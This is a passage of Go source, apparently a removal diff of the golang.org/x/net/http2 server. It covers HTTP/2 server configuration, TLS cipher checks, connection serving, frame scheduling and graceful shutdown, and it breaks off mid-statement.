sc.startGracefulShutdown() - } - s.mu.Unlock() -} - -// ConfigureServer adds HTTP/2 support to a net/http Server. -// -// The configuration conf may be nil. -// -// ConfigureServer must be called before s begins serving. -func ConfigureServer(s *http.Server, conf *Server) error { - if s == nil { - panic("nil *http.Server") - } - if conf == nil { - conf = new(Server) - } - conf.state = &serverInternalState{activeConns: make(map[*serverConn]struct{})} - if err := configureServer18(s, conf); err != nil { - return err - } - if err := configureServer19(s, conf); err != nil { - return err - } - - if s.TLSConfig == nil { - s.TLSConfig = new(tls.Config) - } else if s.TLSConfig.CipherSuites != nil { - // If they already provided a CipherSuite list, return - // an error if it has a bad order or is missing - // ECDHE_RSA_WITH_AES_128_GCM_SHA256. - const requiredCipher = tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 - haveRequired := false - sawBad := false - for i, cs := range s.TLSConfig.CipherSuites { - if cs == requiredCipher { - haveRequired = true - } - if isBadCipher(cs) { - sawBad = true - } else if sawBad { - return fmt.Errorf("http2: TLSConfig.CipherSuites index %d contains an HTTP/2-approved cipher suite (%#04x), but it comes after unapproved cipher suites. With this configuration, clients that don't support previous, approved cipher suites may be given an unapproved one and reject the connection.", i, cs) - } - } - if !haveRequired { - return fmt.Errorf("http2: TLSConfig.CipherSuites is missing HTTP/2-required TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256") - } - } - - // Note: not setting MinVersion to tls.VersionTLS12, - // as we don't want to interfere with HTTP/1.1 traffic - // on the user's server. We enforce TLS 1.2 later once - // we accept a connection. Ideally this should be done - // during next-proto selection, but using TLS <1.2 with - // HTTP/2 is still the client's bug. - - s.TLSConfig.PreferServerCipherSuites = true - - haveNPN := false - for _, p := range s.TLSConfig.NextProtos { - if p == NextProtoTLS { - haveNPN = true - break - } - } - if !haveNPN { - s.TLSConfig.NextProtos = append(s.TLSConfig.NextProtos, NextProtoTLS) - } - - if s.TLSNextProto == nil { - s.TLSNextProto = map[string]func(*http.Server, *tls.Conn, http.Handler){} - } - protoHandler := func(hs *http.Server, c *tls.Conn, h http.Handler) { - if testHookOnConn != nil { - testHookOnConn() - } - conf.ServeConn(c, &ServeConnOpts{ - Handler: h, - BaseConfig: hs, - }) - } - s.TLSNextProto[NextProtoTLS] = protoHandler - return nil -} - -// ServeConnOpts are options for the Server.ServeConn method. -type ServeConnOpts struct { - // BaseConfig optionally sets the base configuration - // for values. If nil, defaults are used. - BaseConfig *http.Server - - // Handler specifies which handler to use for processing - // requests. If nil, BaseConfig.Handler is used. If BaseConfig - // or BaseConfig.Handler is nil, http.DefaultServeMux is used. - Handler http.Handler -} - -func (o *ServeConnOpts) baseConfig() *http.Server { - if o != nil && o.BaseConfig != nil { - return o.BaseConfig - } - return new(http.Server) -} - -func (o *ServeConnOpts) handler() http.Handler { - if o != nil { - if o.Handler != nil { - return o.Handler - } - if o.BaseConfig != nil && o.BaseConfig.Handler != nil { - return o.BaseConfig.Handler - } - } - return http.DefaultServeMux -} - -// ServeConn serves HTTP/2 requests on the provided connection and -// blocks until the connection is no longer readable. -// -// ServeConn starts speaking HTTP/2 assuming that c has not had any -// reads or writes. It writes its initial settings frame and expects -// to be able to read the preface and settings frame from the -// client. If c has a ConnectionState method like a *tls.Conn, the -// ConnectionState is used to verify the TLS ciphersuite and to set -// the Request.TLS field in Handlers. -// -// ServeConn does not support h2c by itself. Any h2c support must be -// implemented in terms of providing a suitably-behaving net.Conn. -// -// The opts parameter is optional. If nil, default values are used. -func (s *Server) ServeConn(c net.Conn, opts *ServeConnOpts) { - baseCtx, cancel := serverConnBaseContext(c, opts) - defer cancel() - - sc := &serverConn{ - srv: s, - hs: opts.baseConfig(), - conn: c, - baseCtx: baseCtx, - remoteAddrStr: c.RemoteAddr().String(), - bw: newBufferedWriter(c), - handler: opts.handler(), - streams: make(map[uint32]*stream), - readFrameCh: make(chan readFrameResult), - wantWriteFrameCh: make(chan FrameWriteRequest, 8), - serveMsgCh: make(chan interface{}, 8), - wroteFrameCh: make(chan frameWriteResult, 1), // buffered; one send in writeFrameAsync - bodyReadCh: make(chan bodyReadMsg), // buffering doesn't matter either way - doneServing: make(chan struct{}), - clientMaxStreams: math.MaxUint32, // Section 6.5.2: "Initially, there is no limit to this value" - advMaxStreams: s.maxConcurrentStreams(), - initialStreamSendWindowSize: initialWindowSize, - maxFrameSize: initialMaxFrameSize, - headerTableSize: initialHeaderTableSize, - serveG: newGoroutineLock(), - pushEnabled: true, - } - - s.state.registerConn(sc) - defer s.state.unregisterConn(sc) - - // The net/http package sets the write deadline from the - // http.Server.WriteTimeout during the TLS handshake, but then - // passes the connection off to us with the deadline already set. - // Write deadlines are set per stream in serverConn.newStream. - // Disarm the net.Conn write deadline here. - if sc.hs.WriteTimeout != 0 { - sc.conn.SetWriteDeadline(time.Time{}) - } - - if s.NewWriteScheduler != nil { - sc.writeSched = s.NewWriteScheduler() - } else { - sc.writeSched = NewRandomWriteScheduler() - } - - // These start at the RFC-specified defaults. If there is a higher - // configured value for inflow, that will be updated when we send a - // WINDOW_UPDATE shortly after sending SETTINGS. - sc.flow.add(initialWindowSize) - sc.inflow.add(initialWindowSize) - sc.hpackEncoder = hpack.NewEncoder(&sc.headerWriteBuf) - - fr := NewFramer(sc.bw, c) - fr.ReadMetaHeaders = hpack.NewDecoder(initialHeaderTableSize, nil) - fr.MaxHeaderListSize = sc.maxHeaderListSize() - fr.SetMaxReadFrameSize(s.maxReadFrameSize()) - sc.framer = fr - - if tc, ok := c.(connectionStater); ok { - sc.tlsState = new(tls.ConnectionState) - *sc.tlsState = tc.ConnectionState() - // 9.2 Use of TLS Features - // An implementation of HTTP/2 over TLS MUST use TLS - // 1.2 or higher with the restrictions on feature set - // and cipher suite described in this section. Due to - // implementation limitations, it might not be - // possible to fail TLS negotiation. An endpoint MUST - // immediately terminate an HTTP/2 connection that - // does not meet the TLS requirements described in - // this section with a connection error (Section - // 5.4.1) of type INADEQUATE_SECURITY. - if sc.tlsState.Version < tls.VersionTLS12 { - sc.rejectConn(ErrCodeInadequateSecurity, "TLS version too low") - return - } - - if sc.tlsState.ServerName == "" { - // Client must use SNI, but we don't enforce that anymore, - // since it was causing problems when connecting to bare IP - // addresses during development. - // - // TODO: optionally enforce? Or enforce at the time we receive - // a new request, and verify the the ServerName matches the :authority? - // But that precludes proxy situations, perhaps. - // - // So for now, do nothing here again. - } - - if !s.PermitProhibitedCipherSuites && isBadCipher(sc.tlsState.CipherSuite) { - // "Endpoints MAY choose to generate a connection error - // (Section 5.4.1) of type INADEQUATE_SECURITY if one of - // the prohibited cipher suites are negotiated." - // - // We choose that. In my opinion, the spec is weak - // here. It also says both parties must support at least - // TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 so there's no - // excuses here. If we really must, we could allow an - // "AllowInsecureWeakCiphers" option on the server later. - // Let's see how it plays out first. - sc.rejectConn(ErrCodeInadequateSecurity, fmt.Sprintf("Prohibited TLS 1.2 Cipher Suite: %x", sc.tlsState.CipherSuite)) - return - } - } - - if hook := testHookGetServerConn; hook != nil { - hook(sc) - } - sc.serve() -} - -func (sc *serverConn) rejectConn(err ErrCode, debug string) { - sc.vlogf("http2: server rejecting conn: %v, %s", err, debug) - // ignoring errors. hanging up anyway. - sc.framer.WriteGoAway(0, err, []byte(debug)) - sc.bw.Flush() - sc.conn.Close() -} - -type serverConn struct { - // Immutable: - srv *Server - hs *http.Server - conn net.Conn - bw *bufferedWriter // writing to conn - handler http.Handler - baseCtx contextContext - framer *Framer - doneServing chan struct{} // closed when serverConn.serve ends - readFrameCh chan readFrameResult // written by serverConn.readFrames - wantWriteFrameCh chan FrameWriteRequest // from handlers -> serve - wroteFrameCh chan frameWriteResult // from writeFrameAsync -> serve, tickles more frame writes - bodyReadCh chan bodyReadMsg // from handlers -> serve - serveMsgCh chan interface{} // misc messages & code to send to / run on the serve loop - flow flow // conn-wide (not stream-specific) outbound flow control - inflow flow // conn-wide inbound flow control - tlsState *tls.ConnectionState // shared by all handlers, like net/http - remoteAddrStr string - writeSched WriteScheduler - - // Everything following is owned by the serve loop; use serveG.check(): - serveG goroutineLock // used to verify funcs are on serve() - pushEnabled bool - sawFirstSettings bool // got the initial SETTINGS frame after the preface - needToSendSettingsAck bool - unackedSettings int // how many SETTINGS have we sent without ACKs? - clientMaxStreams uint32 // SETTINGS_MAX_CONCURRENT_STREAMS from client (our PUSH_PROMISE limit) - advMaxStreams uint32 // our SETTINGS_MAX_CONCURRENT_STREAMS advertised the client - curClientStreams uint32 // number of open streams initiated by the client - curPushedStreams uint32 // number of open streams initiated by server push - maxClientStreamID uint32 // max ever seen from client (odd), or 0 if there have been no client requests - maxPushPromiseID uint32 // ID of the last push promise (even), or 0 if there have been no pushes - streams map[uint32]*stream - initialStreamSendWindowSize int32 - maxFrameSize int32 - headerTableSize uint32 - peerMaxHeaderListSize uint32 // zero means unknown (default) - canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case - writingFrame bool // started writing a frame (on serve goroutine or separate) - writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh - needsFrameFlush bool // last frame write wasn't a flush - inGoAway bool // we've started to or sent GOAWAY - inFrameScheduleLoop bool // whether we're in the scheduleFrameWrite loop - needToSendGoAway bool // we need to schedule a GOAWAY frame write - goAwayCode ErrCode - shutdownTimer *time.Timer // nil until used - idleTimer *time.Timer // nil if unused - - // Owned by the writeFrameAsync goroutine: - headerWriteBuf bytes.Buffer - hpackEncoder *hpack.Encoder - - // Used by startGracefulShutdown. - shutdownOnce sync.Once -} - -func (sc *serverConn) maxHeaderListSize() uint32 { - n := sc.hs.MaxHeaderBytes - if n <= 0 { - n = http.DefaultMaxHeaderBytes - } - // http2's count is in a slightly different unit and includes 32 bytes per pair. - // So, take the net/http.Server value and pad it up a bit, assuming 10 headers. - const perFieldOverhead = 32 // per http2 spec - const typicalHeaders = 10 // conservative - return uint32(n + typicalHeaders*perFieldOverhead) -} - -func (sc *serverConn) curOpenStreams() uint32 { - sc.serveG.check() - return sc.curClientStreams + sc.curPushedStreams -} - -// stream represents a stream. This is the minimal metadata needed by -// the serve goroutine. Most of the actual stream state is owned by -// the http.Handler's goroutine in the responseWriter. Because the -// responseWriter's responseWriterState is recycled at the end of a -// handler, this struct intentionally has no pointer to the -// *responseWriter{,State} itself, as the Handler ending nils out the -// responseWriter's state field. -type stream struct { - // immutable: - sc *serverConn - id uint32 - body *pipe // non-nil if expecting DATA frames - cw closeWaiter // closed wait stream transitions to closed state - ctx contextContext - cancelCtx func() - - // owned by serverConn's serve loop: - bodyBytes int64 // body bytes seen so far - declBodyBytes int64 // or -1 if undeclared - flow flow // limits writing from Handler to client - inflow flow // what the client is allowed to POST/etc to us - parent *stream // or nil - numTrailerValues int64 - weight uint8 - state streamState - resetQueued bool // RST_STREAM queued for write; set by sc.resetStream - gotTrailerHeader bool // HEADER frame for trailers was seen - wroteHeaders bool // whether we wrote headers (not status 100) - writeDeadline *time.Timer // nil if unused - - trailer http.Header // accumulated trailers - reqTrailer http.Header // handler's Request.Trailer -} - -func (sc *serverConn) Framer() *Framer { return sc.framer } -func (sc *serverConn) CloseConn() error { return sc.conn.Close() } -func (sc *serverConn) Flush() error { return sc.bw.Flush() } -func (sc *serverConn) HeaderEncoder() (*hpack.Encoder, *bytes.Buffer) { - return sc.hpackEncoder, &sc.headerWriteBuf -} - -func (sc *serverConn) state(streamID uint32) (streamState, *stream) { - sc.serveG.check() - // http://tools.ietf.org/html/rfc7540#section-5.1 - if st, ok := sc.streams[streamID]; ok { - return st.state, st - } - // "The first use of a new stream identifier implicitly closes all - // streams in the "idle" state that might have been initiated by - // that peer with a lower-valued stream identifier. For example, if - // a client sends a HEADERS frame on stream 7 without ever sending a - // frame on stream 5, then stream 5 transitions to the "closed" - // state when the first frame for stream 7 is sent or received." - if streamID%2 == 1 { - if streamID <= sc.maxClientStreamID { - return stateClosed, nil - } - } else { - if streamID <= sc.maxPushPromiseID { - return stateClosed, nil - } - } - return stateIdle, nil -} - -// setConnState calls the net/http ConnState hook for this connection, if configured. -// Note that the net/http package does StateNew and StateClosed for us. -// There is currently no plan for StateHijacked or hijacking HTTP/2 connections. -func (sc *serverConn) setConnState(state http.ConnState) { - if sc.hs.ConnState != nil { - sc.hs.ConnState(sc.conn, state) - } -} - -func (sc *serverConn) vlogf(format string, args ...interface{}) { - if VerboseLogs { - sc.logf(format, args...) - } -} - -func (sc *serverConn) logf(format string, args ...interface{}) { - if lg := sc.hs.ErrorLog; lg != nil { - lg.Printf(format, args...) - } else { - log.Printf(format, args...) - } -} - -// errno returns v's underlying uintptr, else 0. -// -// TODO: remove this helper function once http2 can use build -// tags. See comment in isClosedConnError. -func errno(v error) uintptr { - if rv := reflect.ValueOf(v); rv.Kind() == reflect.Uintptr { - return uintptr(rv.Uint()) - } - return 0 -} - -// isClosedConnError reports whether err is an error from use of a closed -// network connection. -func isClosedConnError(err error) bool { - if err == nil { - return false - } - - // TODO: remove this string search and be more like the Windows - // case below. That might involve modifying the standard library - // to return better error types. - str := err.Error() - if strings.Contains(str, "use of closed network connection") { - return true - } - - // TODO(bradfitz): x/tools/cmd/bundle doesn't really support - // build tags, so I can't make an http2_windows.go file with - // Windows-specific stuff. Fix that and move this, once we - // have a way to bundle this into std's net/http somehow. - if runtime.GOOS == "windows" { - if oe, ok := err.(*net.OpError); ok && oe.Op == "read" { - if se, ok := oe.Err.(*os.SyscallError); ok && se.Syscall == "wsarecv" { - const WSAECONNABORTED = 10053 - const WSAECONNRESET = 10054 - if n := errno(se.Err); n == WSAECONNRESET || n == WSAECONNABORTED { - return true - } - } - } - } - return false -} - -func (sc *serverConn) condlogf(err error, format string, args ...interface{}) { - if err == nil { - return - } - if err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) { - // Boring, expected errors. - sc.vlogf(format, args...) - } else { - sc.logf(format, args...) - } -} - -func (sc *serverConn) canonicalHeader(v string) string { - sc.serveG.check() - cv, ok := commonCanonHeader[v] - if ok { - return cv - } - cv, ok = sc.canonHeader[v] - if ok { - return cv - } - if sc.canonHeader == nil { - sc.canonHeader = make(map[string]string) - } - cv = http.CanonicalHeaderKey(v) - sc.canonHeader[v] = cv - return cv -} - -type readFrameResult struct { - f Frame // valid until readMore is called - err error - - // readMore should be called once the consumer no longer needs or - // retains f. After readMore, f is invalid and more frames can be - // read. - readMore func() -} - -// readFrames is the loop that reads incoming frames. -// It takes care to only read one frame at a time, blocking until the -// consumer is done with the frame. -// It's run on its own goroutine. -func (sc *serverConn) readFrames() { - gate := make(gate) - gateDone := gate.Done - for { - f, err := sc.framer.ReadFrame() - select { - case sc.readFrameCh <- readFrameResult{f, err, gateDone}: - case <-sc.doneServing: - return - } - select { - case <-gate: - case <-sc.doneServing: - return - } - if terminalReadFrameError(err) { - return - } - } -} - -// frameWriteResult is the message passed from writeFrameAsync to the serve goroutine. -type frameWriteResult struct { - wr FrameWriteRequest // what was written (or attempted) - err error // result of the writeFrame call -} - -// writeFrameAsync runs in its own goroutine and writes a single frame -// and then reports when it's done. -// At most one goroutine can be running writeFrameAsync at a time per -// serverConn. -func (sc *serverConn) writeFrameAsync(wr FrameWriteRequest) { - err := wr.write.writeFrame(sc) - sc.wroteFrameCh <- frameWriteResult{wr, err} -} - -func (sc *serverConn) closeAllStreamsOnConnClose() { - sc.serveG.check() - for _, st := range sc.streams { - sc.closeStream(st, errClientDisconnected) - } -} - -func (sc *serverConn) stopShutdownTimer() { - sc.serveG.check() - if t := sc.shutdownTimer; t != nil { - t.Stop() - } -} - -func (sc *serverConn) notePanic() { - // Note: this is for serverConn.serve panicking, not http.Handler code. - if testHookOnPanicMu != nil { - testHookOnPanicMu.Lock() - defer testHookOnPanicMu.Unlock() - } - if testHookOnPanic != nil { - if e := recover(); e != nil { - if testHookOnPanic(sc, e) { - panic(e) - } - } - } -} - -func (sc *serverConn) serve() { - sc.serveG.check() - defer sc.notePanic() - defer sc.conn.Close() - defer sc.closeAllStreamsOnConnClose() - defer sc.stopShutdownTimer() - defer close(sc.doneServing) // unblocks handlers trying to send - - if VerboseLogs { - sc.vlogf("http2: server connection from %v on %p", sc.conn.RemoteAddr(), sc.hs) - } - - sc.writeFrame(FrameWriteRequest{ - write: writeSettings{ - {SettingMaxFrameSize, sc.srv.maxReadFrameSize()}, - {SettingMaxConcurrentStreams, sc.advMaxStreams}, - {SettingMaxHeaderListSize, sc.maxHeaderListSize()}, - {SettingInitialWindowSize, uint32(sc.srv.initialStreamRecvWindowSize())}, - }, - }) - sc.unackedSettings++ - - // Each connection starts with intialWindowSize inflow tokens. - // If a higher value is configured, we add more tokens. - if diff := sc.srv.initialConnRecvWindowSize() - initialWindowSize; diff > 0 { - sc.sendWindowUpdate(nil, int(diff)) - } - - if err := sc.readPreface(); err != nil { - sc.condlogf(err, "http2: server: error reading preface from client %v: %v", sc.conn.RemoteAddr(), err) - return - } - // Now that we've got the preface, get us out of the - // "StateNew" state. We can't go directly to idle, though. - // Active means we read some data and anticipate a request. We'll - // do another Active when we get a HEADERS frame. - sc.setConnState(http.StateActive) - sc.setConnState(http.StateIdle) - - if sc.srv.IdleTimeout != 0 { - sc.idleTimer = time.AfterFunc(sc.srv.IdleTimeout, sc.onIdleTimer) - defer sc.idleTimer.Stop() - } - - go sc.readFrames() // closed by defer sc.conn.Close above - - settingsTimer := time.AfterFunc(firstSettingsTimeout, sc.onSettingsTimer) - defer settingsTimer.Stop() - - loopNum := 0 - for { - loopNum++ - select { - case wr := <-sc.wantWriteFrameCh: - if se, ok := wr.write.(StreamError); ok { - sc.resetStream(se) - break - } - sc.writeFrame(wr) - case res := <-sc.wroteFrameCh: - sc.wroteFrame(res) - case res := <-sc.readFrameCh: - if !sc.processFrameFromReader(res) { - return - } - res.readMore() - if settingsTimer != nil { - settingsTimer.Stop() - settingsTimer = nil - } - case m := <-sc.bodyReadCh: - sc.noteBodyRead(m.st, m.n) - case msg := <-sc.serveMsgCh: - switch v := msg.(type) { - case func(int): - v(loopNum) // for testing - case *serverMessage: - switch v { - case settingsTimerMsg: - sc.logf("timeout waiting for SETTINGS frames from %v", sc.conn.RemoteAddr()) - return - case idleTimerMsg: - sc.vlogf("connection is idle") - sc.goAway(ErrCodeNo) - case shutdownTimerMsg: - sc.vlogf("GOAWAY close timer fired; closing conn from %v", sc.conn.RemoteAddr()) - return - case gracefulShutdownMsg: - sc.startGracefulShutdownInternal() - default: - panic("unknown timer") - } - case *startPushRequest: - sc.startPush(v) - default: - panic(fmt.Sprintf("unexpected type %T", v)) - } - } - - if sc.inGoAway && sc.curOpenStreams() == 0 && !sc.needToSendGoAway && !sc.writingFrame { - return - } - } -} - -func (sc *serverConn) awaitGracefulShutdown(sharedCh <-chan struct{}, privateCh chan struct{}) { - select { - case <-sc.doneServing: - case <-sharedCh: - close(privateCh) - } -} - -type serverMessage int - -// Message values sent to serveMsgCh. -var ( - settingsTimerMsg = new(serverMessage) - idleTimerMsg = new(serverMessage) - shutdownTimerMsg = new(serverMessage) - gracefulShutdownMsg = new(serverMessage) -) - -func (sc *serverConn) onSettingsTimer() { sc.sendServeMsg(settingsTimerMsg) } -func (sc *serverConn) onIdleTimer() { sc.sendServeMsg(idleTimerMsg) } -func (sc *serverConn) onShutdownTimer() { sc.sendServeMsg(shutdownTimerMsg) } - -func (sc *serverConn) sendServeMsg(msg interface{}) { - sc.serveG.checkNotOn() // NOT - select { - case sc.serveMsgCh <- msg: - case <-sc.doneServing: - } -} - -// readPreface reads the ClientPreface greeting from the peer -// or returns an error on timeout or an invalid greeting. -func (sc *serverConn) readPreface() error { - errc := make(chan error, 1) - go func() { - // Read the client preface - buf := make([]byte, len(ClientPreface)) - if _, err := io.ReadFull(sc.conn, buf); err != nil { - errc <- err - } else if !bytes.Equal(buf, clientPreface) { - errc <- fmt.Errorf("bogus greeting %q", buf) - } else { - errc <- nil - } - }() - timer := time.NewTimer(prefaceTimeout) // TODO: configurable on *Server? - defer timer.Stop() - select { - case <-timer.C: - return errors.New("timeout waiting for client preface") - case err := <-errc: - if err == nil { - if VerboseLogs { - sc.vlogf("http2: server: client %v said hello", sc.conn.RemoteAddr()) - } - } - return err - } -} - -var errChanPool = sync.Pool{ - New: func() interface{} { return make(chan error, 1) }, -} - -var writeDataPool = sync.Pool{ - New: func() interface{} { return new(writeData) }, -} - -// writeDataFromHandler writes DATA response frames from a handler on -// the given stream. -func (sc *serverConn) writeDataFromHandler(stream *stream, data []byte, endStream bool) error { - ch := errChanPool.Get().(chan error) - writeArg := writeDataPool.Get().(*writeData) - *writeArg = writeData{stream.id, data, endStream} - err := sc.writeFrameFromHandler(FrameWriteRequest{ - write: writeArg, - stream: stream, - done: ch, - }) - if err != nil { - return err - } - var frameWriteDone bool // the frame write is done (successfully or not) - select { - case err = <-ch: - frameWriteDone = true - case <-sc.doneServing: - return errClientDisconnected - case <-stream.cw: - // If both ch and stream.cw were ready (as might - // happen on the final Write after an http.Handler - // ends), prefer the write result. Otherwise this - // might just be us successfully closing the stream. - // The writeFrameAsync and serve goroutines guarantee - // that the ch send will happen before the stream.cw - // close. - select { - case err = <-ch: - frameWriteDone = true - default: - return errStreamClosed - } - } - errChanPool.Put(ch) - if frameWriteDone { - writeDataPool.Put(writeArg) - } - return err -} - -// writeFrameFromHandler sends wr to sc.wantWriteFrameCh, but aborts -// if the connection has gone away. -// -// This must not be run from the serve goroutine itself, else it might -// deadlock writing to sc.wantWriteFrameCh (which is only mildly -// buffered and is read by serve itself). If you're on the serve -// goroutine, call writeFrame instead. -func (sc *serverConn) writeFrameFromHandler(wr FrameWriteRequest) error { - sc.serveG.checkNotOn() // NOT - select { - case sc.wantWriteFrameCh <- wr: - return nil - case <-sc.doneServing: - // Serve loop is gone. - // Client has closed their connection to the server. - return errClientDisconnected - } -} - -// writeFrame schedules a frame to write and sends it if there's nothing -// already being written. -// -// There is no pushback here (the serve goroutine never blocks). It's -// the http.Handlers that block, waiting for their previous frames to -// make it onto the wire -// -// If you're not on the serve goroutine, use writeFrameFromHandler instead. -func (sc *serverConn) writeFrame(wr FrameWriteRequest) { - sc.serveG.check() - - // If true, wr will not be written and wr.done will not be signaled. - var ignoreWrite bool - - // We are not allowed to write frames on closed streams. RFC 7540 Section - // 5.1.1 says: "An endpoint MUST NOT send frames other than PRIORITY on - // a closed stream." Our server never sends PRIORITY, so that exception - // does not apply. - // - // The serverConn might close an open stream while the stream's handler - // is still running. For example, the server might close a stream when it - // receives bad data from the client. If this happens, the handler might - // attempt to write a frame after the stream has been closed (since the - // handler hasn't yet been notified of the close). In this case, we simply - // ignore the frame. The handler will notice that the stream is closed when - // it waits for the frame to be written. - // - // As an exception to this rule, we allow sending RST_STREAM after close. - // This allows us to immediately reject new streams without tracking any - // state for those streams (except for the queued RST_STREAM frame). This - // may result in duplicate RST_STREAMs in some cases, but the client should - // ignore those. - if wr.StreamID() != 0 { - _, isReset := wr.write.(StreamError) - if state, _ := sc.state(wr.StreamID()); state == stateClosed && !isReset { - ignoreWrite = true - } - } - - // Don't send a 100-continue response if we've already sent headers. - // See golang.org/issue/14030. - switch wr.write.(type) { - case *writeResHeaders: - wr.stream.wroteHeaders = true - case write100ContinueHeadersFrame: - if wr.stream.wroteHeaders { - // We do not need to notify wr.done because this frame is - // never written with wr.done != nil. - if wr.done != nil { - panic("wr.done != nil for write100ContinueHeadersFrame") - } - ignoreWrite = true - } - } - - if !ignoreWrite { - sc.writeSched.Push(wr) - } - sc.scheduleFrameWrite() -} - -// startFrameWrite starts a goroutine to write wr (in a separate -// goroutine since that might block on the network), and updates the -// serve goroutine's state about the world, updated from info in wr. -func (sc *serverConn) startFrameWrite(wr FrameWriteRequest) { - sc.serveG.check() - if sc.writingFrame { - panic("internal error: can only be writing one frame at a time") - } - - st := wr.stream - if st != nil { - switch st.state { - case stateHalfClosedLocal: - switch wr.write.(type) { - case StreamError, handlerPanicRST, writeWindowUpdate: - // RFC 7540 Section 5.1 allows sending RST_STREAM, PRIORITY, and WINDOW_UPDATE - // in this state. (We never send PRIORITY from the server, so that is not checked.) - default: - panic(fmt.Sprintf("internal error: attempt to send frame on a half-closed-local stream: %v", wr)) - } - case stateClosed: - panic(fmt.Sprintf("internal error: attempt to send frame on a closed stream: %v", wr)) - } - } - if wpp, ok := wr.write.(*writePushPromise); ok { - var err error - wpp.promisedID, err = wpp.allocatePromisedID() - if err != nil { - sc.writingFrameAsync = false - wr.replyToWriter(err) - return - } - } - - sc.writingFrame = true - sc.needsFrameFlush = true - if wr.write.staysWithinBuffer(sc.bw.Available()) { - sc.writingFrameAsync = false - err := wr.write.writeFrame(sc) - sc.wroteFrame(frameWriteResult{wr, err}) - } else { - sc.writingFrameAsync = true - go sc.writeFrameAsync(wr) - } -} - -// errHandlerPanicked is the error given to any callers blocked in a read from -// Request.Body when the main goroutine panics. Since most handlers read in the -// the main ServeHTTP goroutine, this will show up rarely. -var errHandlerPanicked = errors.New("http2: handler panicked") - -// wroteFrame is called on the serve goroutine with the result of -// whatever happened on writeFrameAsync. -func (sc *serverConn) wroteFrame(res frameWriteResult) { - sc.serveG.check() - if !sc.writingFrame { - panic("internal error: expected to be already writing a frame") - } - sc.writingFrame = false - sc.writingFrameAsync = false - - wr := res.wr - - if writeEndsStream(wr.write) { - st := wr.stream - if st == nil { - panic("internal error: expecting non-nil stream") - } - switch st.state { - case stateOpen: - // Here we would go to stateHalfClosedLocal in - // theory, but since our handler is done and - // the net/http package provides no mechanism - // for closing a ResponseWriter while still - // reading data (see possible TODO at top of - // this file), we go into closed state here - // anyway, after telling the peer we're - // hanging up on them. We'll transition to - // stateClosed after the RST_STREAM frame is - // written. - st.state = stateHalfClosedLocal - // Section 8.1: a server MAY request that the client abort - // transmission of a request without error by sending a - // RST_STREAM with an error code of NO_ERROR after sending - // a complete response. - sc.resetStream(streamError(st.id, ErrCodeNo)) - case stateHalfClosedRemote: - sc.closeStream(st, errHandlerComplete) - } - } else { - switch v := wr.write.(type) { - case StreamError: - // st may be unknown if the RST_STREAM was generated to reject bad input. - if st, ok := sc.streams[v.StreamID]; ok { - sc.closeStream(st, v) - } - case handlerPanicRST: - sc.closeStream(wr.stream, errHandlerPanicked) - } - } - - // Reply (if requested) to unblock the ServeHTTP goroutine. - wr.replyToWriter(res.err) - - sc.scheduleFrameWrite() -} - -// scheduleFrameWrite tickles the frame writing scheduler. -// -// If a frame is already being written, nothing happens. This will be called again -// when the frame is done being written. -// -// If a frame isn't being written we need to send one, the best frame -// to send is selected, preferring first things that aren't -// stream-specific (e.g. ACKing settings), and then finding the -// highest priority stream. -// -// If a frame isn't being written and there's nothing else to send, we -// flush the write buffer. -func (sc *serverConn) scheduleFrameWrite() { - sc.serveG.check() - if sc.writingFrame || sc.inFrameScheduleLoop { - return - } - sc.inFrameScheduleLoop = true - for !sc.writingFrameAsync { - if sc.needToSendGoAway { - sc.needToSendGoAway = false - sc.startFrameWrite(FrameWriteRequest{ - write: &writeGoAway{ - maxStreamID: sc.maxClientStreamID, - code: sc.goAwayCode, - }, - }) - continue - } - if sc.needToSendSettingsAck { - sc.needToSendSettingsAck = false - sc.startFrameWrite(FrameWriteRequest{write: writeSettingsAck{}}) - continue - } - if !sc.inGoAway || sc.goAwayCode == ErrCodeNo { - if wr, ok := sc.writeSched.Pop(); ok { - sc.startFrameWrite(wr) - continue - } - } - if sc.needsFrameFlush { - sc.startFrameWrite(FrameWriteRequest{write: flushFrameWriter{}}) - sc.needsFrameFlush = false // after startFrameWrite, since it sets this true - continue - } - break - } - sc.inFrameScheduleLoop = false -} - -// startGracefulShutdown gracefully shuts down a connection. This -// sends GOAWAY with ErrCodeNo to tell the client we're gracefully -// shutting down. The connection isn't closed until all current -// streams are done. -// -// startGracefulShutdown returns immediately; it does not wait until -// the connection has shut down. -func (sc *serverConn) startGracefulShutdown() { - sc.serveG.checkNotOn() // NOT - sc.shutdownOnce.Do(func() { sc.sendServeMsg(gracefulShutdownMsg) }) -} - -func (sc *serverConn) startGracefulShutdownInternal() { - sc.goAwayIn(ErrCodeNo, 0) -} - -func (sc *serverConn) goAway(code ErrCode) { - sc.serveG.check() - var forceCloseIn time.Duration - if code != ErrCodeNo { - forceCloseIn = 250 * time.Millisecond - } else { - // TODO: configurable - forceCloseIn = 1 * time.Second - } - sc.goAwayIn(code, forceCloseIn) -} - -func (sc *serverConn) goAwayIn(code ErrCode, forceCloseIn time.Duration) { - sc.serveG.check() - if sc.inGoAway { - return - } - if forceCloseIn != 0 { - sc.shutDownIn(forceCloseIn) - } - sc.inGoAway = true - sc.needToSendGoAway = true - sc.goAwayCode = code - sc.scheduleFrameWrite() -} - -func (sc *serverConn) shutDownIn(d time.Duration) { - sc.serveG.check() - sc.shutdownTimer = time.AfterFunc(d, sc.onShutdownTimer) -} - -func (sc *serverConn) resetStream(se StreamError) { - sc.serveG.check() - sc.writeFrame(FrameWriteRequest{write: se}) - if st, ok := sc.streams[se.StreamID]; ok { - st.resetQueued = true - } -} - -// processFrameFromReader processes the serve loop's read from readFrameCh from the -// frame-reading goroutine. -// processFrameFromReader returns whether the connection should be kept open. -func (sc *serverConn) processFrameFromReader(res readFrameResult) bool { - sc.serveG.check() - err := res.err - if err != nil { - if err == ErrFrameTooLarge { - sc.goAway(ErrCodeFrameSize) - return true // goAway will close the loop - } - clientGone := err == io.EOF || err == io.ErrUnexpectedEOF || isClosedConnError(err) - if clientGone { - // TODO: could we also get into this state if - // the peer does a half close - // (e.g. CloseWrite) because they're done - // sending frames but they're still wanting - // our open replies? Investigate. - // TODO: add CloseWrite to crypto/tls.Conn first - // so we have a way to test this? I suppose - // just for testing we could have a non-TLS mode. - return false - } - } else { - f := res.f - if VerboseLogs { - 